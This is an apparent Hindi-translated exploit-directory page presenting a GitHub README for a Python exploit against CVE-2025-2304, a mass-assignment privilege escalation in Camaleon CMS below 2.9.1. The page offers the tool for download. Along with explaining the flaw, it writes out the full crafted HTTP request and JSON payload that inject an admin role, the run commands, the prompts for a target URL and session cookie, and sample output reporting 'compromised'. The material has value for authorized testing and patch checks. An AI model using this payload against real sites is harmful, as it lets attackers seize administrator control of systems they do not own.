Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2304-exploit — CVE-2025-2304 के लिए पायथन एक्सप्लॉइट स्क्रिप्ट, जो Camaleon CMS में मास असाइनमेंट विशेषाधिकार वृद्धि है। यह CSRF टोकन पार्सिंग और भूमिका पैरामीटर इंजेक्शन को स्वचालित करता है ताकि प्रमाणित उपयोगकर्ताओं को नियंत्रित प्रयोगशाला वातावरण में एडमिन तक उन्नत किया जा सके। | Kitploit
उपकरण/GitHubGitHub/jeanback1/cve-2025-2304-exploit
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
jeanback1/cve-2025-2304-exploit

CVE-2025-2304-exploit

CVE-2025-2304 के लिए पायथन एक्सप्लॉइट स्क्रिप्ट, जो Camaleon CMS में मास असाइनमेंट विशेषाधिकार वृद्धि है। यह CSRF टोकन पार्सिंग और भूमिका पैरामीटर इंजेक्शन को स्वचालित करता है ताकि प्रमाणित उपयोगकर्ताओं को नियंत्रित प्रयोगशाला वातावरण में एडमिन तक उन्नत किया जा सके।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-2304 - Camaleon CMS मास असाइनमेंट विशेषाधिकार वृद्धि

📌 परियोजना विवरण

CVE-2025-2304 Camaleon CMS (संस्करण < 2.9.1) में एक मास असाइनमेंट भेद्यता है जो एक प्रमाणित उपयोगकर्ता को पासवर्ड बदलने के अनुरोधों में role पैरामीटर में हेरफेर करके अपने विशेषाधिकारों को व्यवस्थापक तक बढ़ाने की अनुमति देती है।

Python 3.x License Security Status

🚨 तकनीकी भेद्यता स्पष्टीकरण

भेद्यता संदर्भ

Camaleon CMS Ruby on Rails का उपयोग करता है और संस्करण 2.9.0 में UsersController#updated_ajax नियंत्रक में एक मास असाइनमेंट भेद्यता है। नियंत्रक बिना किसी प्रतिबंध के .permit! का उपयोग करता है, जिससे अनुरोध में भेजे गए किसी भी पैरामीटर को सीधे उपयोगकर्ता मॉडल को निर्दिष्ट किया जा सकता है।

हमला वेक्टर

  1. कमजोर एंडपॉइंट: POST /admin/users/{user_id}/updated_ajax
  2. महत्वपूर्ण पैरामीटर: password नाम स्थान के भीतर भेजा गया password[role]
  3. तंत्र: नियंत्रक params.require(:password) को संसाधित करता है और फिर .permit! लागू करता है, जो किसी भी पैरामीटर को फ़िल्टर नहीं करता
  4. परिणाम: उपयोगकर्ता के role फ़ील्ड में "admin" मान का इंजेक्शन

तकनीकी प्रवाह

root@kitploit:~
POST /admin/users/3/updated_ajax
Content-Type: application/x-www-form-urlencoded

authenticity_token=[TOKEN]&
password[password]=new_password&
password[password_confirmation]=new_password&
password[role]=admin&
password[id]=3&
_method=patch

password[role] पैरामीटर User.update(permitted_params) द्वारा संसाधित किया जाता है और .permit! के कारण सीधे उपयोगकर्ता रिकॉर्ड को निर्दिष्ट किया जाता है, जिससे विशेषाधिकार user से admin तक बढ़ जाते हैं।

⚡ स्थापना और उपयोग

पूर्वापेक्षाएँ

root@kitploit:~
# Python 3.6+
python3 --version

# Required libraries
pip install requests

स्क्रिप्ट निष्पादन

अंग्रेज़ी संस्करण:

root@kitploit:~
python3 exploit_cve_2025_2304_en.py

स्पेनिश संस्करण:

root@kitploit:~
python3 exploit_cve_2025_2304.py

आवश्यक इनपुट

स्क्रिप्ट इंटरैक्टिव रूप से पूछेगी:

  1. सर्वर आधार URL: http(s)://domain:port
  2. उपयोगकर्ता आईडी: हमलावर उपयोगकर्ता पहचानकर्ता
  3. सत्र कुकी: _cms_session मान (लॉगिन के बाद प्राप्त)
  4. नया पासवर्ड: वैकल्पिक (डिफ़ॉल्ट: P@ssw0rd_lab_2025!)

पूर्ण कमांड उदाहरण

root@kitploit:~
python3 exploit_cve_2025_2304_en.py
root@kitploit:~
[?] Base URL of the server (ex: http://localhost:3000) : http://192.168.1.100:8080
[?] User ID of the attacker user (ex: 3) : 5
[?] Session cookie (_cms_session=VALUE) : _cms_session=abc123def456

🔧 इस स्क्रिप्ट के बारे में

मैंने यह क्यों बनाया?

जब मुझे यह भेद्यता मिली, तो मेरी पहली प्रवृत्ति इसे Burp Suite के माध्यम से मैन्युअल रूप से परीक्षण करने की थी — और यह काम कर गया। लेकिन मैं एक कदम और आगे जाना चाहता था और उस मैनुअल प्रक्रिया को कुछ दोहराने योग्य और पोर्टेबल में बदलना चाहता था, इसलिए मैंने यह स्क्रिप्ट लिखी। बग का शोषण करने के अलावा, इसे बनाने ने मुझे कुछ चीजों पर काम करने का मौका दिया जो मुझे वास्तव में दिलचस्प लगती हैं:

  • सत्र हैंडलिंग के साथ बहु-चरण HTTP प्रवाह को स्वचालित करना
  • लाइव प्रतिक्रियाओं से गतिशील रूप से CSRF टोकन पार्स करना
  • एक ही एंडपॉइंट से असंगत JSON/HTML प्रतिक्रियाओं से निपटना
  • यह जानना कि शोषण कब सफल हुआ — और कब नहीं हुआ

मैं Burp या Caido को बदलने की कोशिश नहीं कर रहा हूँ। इंटरैक्टिव परीक्षण के लिए वे उपकरण अपूरणीय हैं। यह सिर्फ वही है जो तब होता है जब मैं खुद को दोहराने के बजाय एक स्क्रिप्ट लिखना पसंद करता हूँ।

⚠️ अस्वीकरण और नैतिक विचार

महत्वपूर्ण कानूनी चेतावनी

root@kitploit:~
यह स्क्रिप्ट विशेष रूप से इसके लिए है:
- नियंत्रित प्रयोगशाला वातावरण
- वे सिस्टम जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण है
- शैक्षिक उद्देश्य और अधिकृत अनुसंधान

सख्ती से निषिद्ध:
- बिना प्राधिकरण के सिस्टम पर उपयोग
- दुर्भावनापूर्ण इरादे से आवेदन
- डेटा सुरक्षा कानूनों का उल्लंघन
- तीसरे पक्ष की सुरक्षा से समझौता

लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है।

📊 उदाहरण स्क्रीनशॉट

सफल निष्पादन

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║        CVE-2025-2304 │ Camaleon CMS मास असाइनमेंट          ║
║        विशेषाधिकार वृद्धि: user → admin                    ║
║        [प्रयोगशाला / नियंत्रित वातावरण]                 ║
╚══════════════════════════════════════════════════════════════╝

[✔] CSRF टोकन प्राप्त: abc123def456...
[✔] शोषण सफल: सर्वर ने अद्यतन की पुष्टि की।
[✔] स्थिति: समझौता
   उपयोगकर्ता 5 के पास अब 'admin' भूमिका होनी चाहिए।

पेलोड संरचना

root@kitploit:~
{
    "authenticity_token": "abcd1234",
    "password[password]": "P@ssw0rd_lab_2025!",
    "password[password_confirmation]": "P@ssw0rd_lab_2025!",
    "password[role]": "admin",
    "password[id]": "5",
    "_method": "patch"
}

🛠 रोडमैप और भविष्य में सुधार

नियोजित सुधार

  1. लॉगिन ऑटोमेशन: सत्र स्वचालित रूप से प्राप्त करने के लिए एकीकरण
  2. संस्करण पहचान: कमजोर संस्करण की पुष्टि करने के लिए फ़िंगरप्रिंटिंग स्क्रिप्ट
  3. स्वचालित पाइपलाइनों में स्वच्छ आउटपुट के लिए वर्बोज़/क्वाइट मोड
  4. थोक परीक्षण: एक साथ कई उपयोगकर्ताओं/URL का परीक्षण करने की क्षमता
  5. उत्पन्न रिपोर्ट: JSON/HTML प्रारूप में परिणाम निर्यात करें

विस्तार क्षमता

कोड को मॉड्यूलर रूप से संरचित किया गया है ताकि सुविधा हो:

  • अन्य मास असाइनमेंट भेद्यताओं के लिए अनुकूलन
  • पेंटेस्टिंग फ्रेमवर्क में एकीकरण
  • लॉगिंग और निगरानी सुविधाएँ जोड़ना

📚 संदर्भ और संसाधन

  • आधिकारिक CVE: CVE-2025-2304
  • Camaleon CMS: आधिकारिक रिपॉजिटरी
  • पैच: संस्करण 2.9.1 .permit! के उपयोग को ठीक करता है
  • Rails दस्तावेज़ीकरण: Strong Parameters

🤝 योगदान

जो योगदान का स्वागत है:

  1. सफलता की स्थिति का पता लगाने में सुधार
  2. नैतिक फोकस बनाए रखते हुए कार्यक्षमता जोड़ना
  3. बग ठीक करना या त्रुटि प्रबंधन में सुधार करना
  4. अतिरिक्त उपयोग के मामलों का दस्तावेज़ीकरण

याद रखें: इस परियोजना का उद्देश्य विशेष रूप से शैक्षिक और अधिकृत अनुसंधान है।


अंतिम अद्यतन: अप्रैल 2025 | सुरक्षा विश्लेषक (प्रयोगशाला वातावरण) द्वारा

टूल डाउनलोड करें